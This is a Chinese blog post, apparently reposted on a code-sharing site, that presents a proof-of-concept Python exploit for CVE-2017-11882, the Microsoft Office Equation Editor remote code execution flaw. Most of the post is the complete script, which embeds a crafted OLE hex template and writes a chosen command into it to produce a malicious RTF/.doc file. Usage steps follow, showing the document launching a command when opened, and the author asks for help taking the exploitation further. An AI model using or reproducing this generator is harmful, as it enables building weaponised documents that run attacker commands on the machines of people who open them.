码迷,mamicode.com
首页 > 其他好文 > 详细

Office--CVE-2017-11882【远程代码执行】

时间:2017-11-23 08:42:31      阅读:375      评论:0      收藏:0      [点我收藏+]

标签:lex   shp   命令   hex   data   ges   rect   level   rtl   

Office远程代码执行漏洞现POC样本

最近这段时间CVE-2017-11882挺火的。关于这个漏洞可以看看这里:https://www.77169.com/html/186186.html

今天在twitter上看到有人共享了一个POC,https://twitter.com/gossithedog/status/932694287480913920,http://owned.lab6.com/%7Egossi/research/public/cve-2017-11882/,后来又看到有人共享了一个项目https://github.com/embedi/CVE-2017-11882,简单看了一下这个项目,通过对rtf文件的修改来实现命令执行的目的,但是有个缺陷就是,这个项目使用的是使用webdav的方式来执行远程文件的,使用起来可能并不容易,所以就对此文件进行了简单的修改,具体项目地址如下:

POC地址:https://github.com/Ridter/CVE-2017-11882/

POC源码如下:

  1 import argparse
  2 import sys
  3 
  4 
  5 RTF_HEADER = R"""{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Calibri;}}
  6 {\*\generator Riched20 6.3.9600}\viewkind4\uc1
  7 \pard\sa200\sl276\slmult1\f0\fs22\lang9"""
  8 
  9 
 10 RTF_TRAILER = R"""\par}
 11 """
 12 
 13 
 14 OBJECT_HEADER = R"""{\object\objemb\objupdate{\*\objclass Equation.3}\objw380\objh260{\*\objdata """
 15 
 16 
 17 OBJECT_TRAILER = R"""
 18 }{\result {\rtlch\fcs1 \af0 \ltrch\fcs0 \dn8\insrsid95542\charrsid95542 {\pict{\*\picprop\shplid1025{\sp{\sn shapeType}{\sv 75}}{\sp{\sn fFlipH}{\sv 0}}
 19 {\sp{\sn fFlipV}{\sv 0}}{\sp{\sn fLockAspectRatio}{\sv 1}}{\sp{\sn pictureGray}{\sv 0}}{\sp{\sn pictureBiLevel}{\sv 0}}{\sp{\sn fRecolorFillAsPicture}{\sv 0}}{\sp{\sn fUseShapeAnchor}{\sv 0}}{\sp{\sn fFilled}{\sv 0}}{\sp{\sn fHitTestFill}{\sv 1}}
 20 {\sp{\sn fillShape}{\sv 1}}{\sp{\sn fillUseRect}{\sv 0}}{\sp{\sn fNoFillHitTest}{\sv 0}}{\sp{\sn fLine}{\sv 0}}{\sp{\sn fPreferRelativeResize}{\sv 1}}{\sp{\sn fReallyHidden}{\sv 0}}
 21 {\sp{\sn fScriptAnchor}{\sv 0}}{\sp{\sn fFakeMaster}{\sv 0}}{\sp{\sn fCameFromImgDummy}{\sv 0}}{\sp{\sn fLayoutInCell}{\sv 1}}}\picscalex100\picscaley100\piccropl0\piccropr0\piccropt0\piccropb0
 22 \picw353\pich600\picwgoal200\pichgoal340\wmetafile8\bliptag1846300541\blipupi2307{\*\blipuid 6e0c4f7df03da08a8c6c623556e3c652}0100090000035100000000001200000000000500000009020000000005000000020101000000050000000102ffffff00050000002e0118000000050000000b02
 23 00000000050000000c02200240011200000026060f001a00ffffffff000010000000c0ffffffaaffffff00010000ca0100000b00000026060f000c004d61746854797065000040000a00000026060f000a00ffffffff010000000000030000000000}}}}
 24 """
 25 
 26 
 27 OBJDATA_TEMPLATE = R"""
 28 01050000020000000b0000004571756174696f6e2e33000000000000000000000c0000d0cf11e0a1
 29 b11ae1000000000000000000000000000000003e000300feff090006000000000000000000000001
 30 0000000100000000000000001000000200000001000000feffffff0000000000000000ffffffffff
 31 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 32 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 33 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 34 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 35 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 36 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 37 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 38 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 39 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 40 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 41 fffffffffffffffffffffffffffffffffffffffffffffffffffffffdffffff04000000fefffffffe
 42 fffffffeffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 43 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 44 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 45 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 46 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 47 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 48 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 49 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 50 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 51 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 52 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 53 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 54 ffffffffffffffffffffffffffffffffffffff52006f006f007400200045006e0074007200790000
 55 00000000000000000000000000000000000000000000000000000000000000000000000000000000
 56 00000016000500ffffffffffffffff0200000002ce020000000000c0000000000000460000000000
 57 000000000000008020cea5613cd30103000000000200000000000001004f006c0065000000000000
 58 00000000000000000000000000000000000000000000000000000000000000000000000000000000
 59 00000000000000000000000a000201ffffffffffffffffffffffff00000000000000000000000000
 60 0000000000000000000000000000000000000000000000000000001400000000000000010043006f
 61 006d0070004f0062006a000000000000000000000000000000000000000000000000000000000000
 62 00000000000000000000000000000000000000120002010100000003000000ffffffff0000000000
 63 00000000000000000000000000000000000000000000000000000000000000010000006600000000
 64 00000003004f0062006a0049006e0066006f00000000000000000000000000000000000000000000
 65 00000000000000000000000000000000000000000000000000000012000201ffffffff04000000ff
 66 ffffff00000000000000000000000000000000000000000000000000000000000000000000000003
 67 0000000600000000000000feffffff02000000fefffffffeffffff050000000600000007000000fe
 68 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 69 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 70 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 71 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 72 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 73 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 74 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 75 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 76 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 77 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 78 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 79 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 80 ffffff01000002080000000000000000000000000000000000000000000000000000000000000000
 81 0000000000000000000000000000000000000000000000000000000100feff030a0000ffffffff02
 82 ce020000000000c000000000000046170000004d6963726f736f6674204571756174696f6e20332e
 83 30000c0000004453204571756174696f6e000b0000004571756174696f6e2e3300f439b271000000
 84 00000000000000000000000000000000000000000000000000000000000000000000000000030004
 85 00000000000000000000000000000000000000000000000000000000000000000000000000000000
 86 000000000000000000000000000000000000001c00000002009ec4a900000000000000c8a75c00c4
 87 ee5b0000000000030101030a0a01085a5a4141414141414141414141414141414141414141414141
 88 414141414141414141414141414141414141414141120c4300000000000000000000000000000000
 89 00000000000000000000000000000000000000000000000000000000000000000000000000000000
 90 00000000000000000000000000000000000000000000000000000000000000000000000000000000
 91 00000000000000000000000000000000000000000000000000000000000000000000000000000000
 92 00000000000000000000000000000000000000000000000000000000000000000000004500710075
 93 006100740069006f006e0020004e0061007400690076006500000000000000000000000000000000
 94 0000000000000000000000000000000000000020000200ffffffffffffffffffffffff0000000000
 95 0000000000000000000000000000000000000000000000000000000000000004000000c500000000
 96 00000000000000000000000000000000000000000000000000000000000000000000000000000000
 97 00000000000000000000000000000000000000000000000000000000000000ffffffffffffffffff
 98 ffffff00000000000000000000000000000000000000000000000000000000000000000000000000
 99 00000000000000000000000000000000000000000000000000000000000000000000000000000000
100 000000000000000000000000000000000000000000000000000000000000000000000000000000ff
101 ffffffffffffffffffffff0000000000000000000000000000000000000000000000000000000000
102 00000000000000000000000000000000000000000000000000000000000000000000000000000000
103 00000000000000000000000000000000000000000000000000000000000000000000000000000000
104 00000000000000ffffffffffffffffffffffff000000000000000000000000000000000000000000
105 00000000000000000000000000000000000000000000000000000001050000050000000d0000004d
106 45544146494c4550494354003421000035feffff9201000008003421cb010000010009000003c500
107 000002001c00000000000500000009020000000005000000020101000000050000000102ffffff00
108 050000002e0118000000050000000b0200000000050000000c02a001201e1200000026060f001a00
109 ffffffff000010000000c0ffffffc6ffffffe01d0000660100000b00000026060f000c004d617468
110 54797065000020001c000000fb0280fe0000000000009001000000000402001054696d6573204e65
111 7720526f6d616e00feffffff6b2c0a0700000a0000000000040000002d0100000c000000320a6001
112 90160a000000313131313131313131310c000000320a6001100f0a00000031313131313131313131
113 0c000000320a600190070a000000313131313131313131310c000000320a600110000a0000003131
114 31313131313131310a00000026060f000a00ffffffff0100000000001c000000fb02100007000000
115 0000bc02000000000102022253797374656d000048008a0100000a000600000048008a01ffffffff
116 7cef1800040000002d01010004000000f0010000030000000000
117 """
118 
119 
120 COMMAND_OFFSET = 0x949*2
121 
122 
123 def create_ole_exec_primitive(command):
124     if len(command) > 43:
125         print "[!] Primitive command must be shorter than 43 bytes"
126         sys.exit(0)
127     hex_command = command.encode("hex")
128     objdata_hex_stream = OBJDATA_TEMPLATE.translate(None, "\r\n")
129     ole_data = objdata_hex_stream[:COMMAND_OFFSET] + hex_command + objdata_hex_stream[COMMAND_OFFSET + len(hex_command):]
130     return OBJECT_HEADER + ole_data + OBJECT_TRAILER
131 
132 
133 
134 def create_rtf(header,command,trailer):
135     ole1 = create_ole_exec_primitive(command + " &")
136     
137     # We need 2 or more commands for executing remote file from WebDAV
138     # because WebClient service start may take some time
139     return header + ole1 + trailer
140 
141 
142 
143 if __name__ == __main__:
144     parser = argparse.ArgumentParser(description="PoC for CVE-2017-11882")
145     parser.add_argument("-c", "--command", help="Command to execute.", required=True)
146     parser.add_argument(-o, "--output", help="Output exploit rtf", required=True)
147 
148     args = parser.parse_args()
149 
150     rtf_content = create_rtf(RTF_HEADER, args.command ,RTF_TRAILER)
151     
152     output_file = open(args.output, "w")
153     output_file.write(rtf_content)
154 
155 print "[*] Done ! output file --> " + args.output

使用方式很简单,如果要执行命令:

python python.py -c "cmd.exe /c calc.exe" -o 1.doc,则:

技术分享图片

那么相应地生成了1.doc文件:当我打开1.doc的时候 会提示如下信息:

技术分享图片

点击允许之后:

技术分享图片

就会自动调用计算器,关于进一步的漏洞利用,还需要各位大佬指点,非常感谢!!!

 

Office--CVE-2017-11882【远程代码执行】

标签:lex   shp   命令   hex   data   ges   rect   level   rtl   

原文地址:http://www.cnblogs.com/wjvzbr/p/7881501.html
(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
分享档案
更多>
2021年07月29日 (22)
2021年07月28日 (40)
2021年07月27日 (32)
2021年07月26日 (79)
2021年07月23日 (29)
2021年07月22日 (30)
2021年07月21日 (42)
2021年07月20日 (16)
2021年07月19日 (90)
2021年07月16日 (35)
周排行
mamicode.com排行更多图片
更多
友情链接
兰亭集智   国之画   百度统计   站长统计   阿里云   chrome插件   新版天听网
关于我们 - 联系我们 - 留言反馈
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!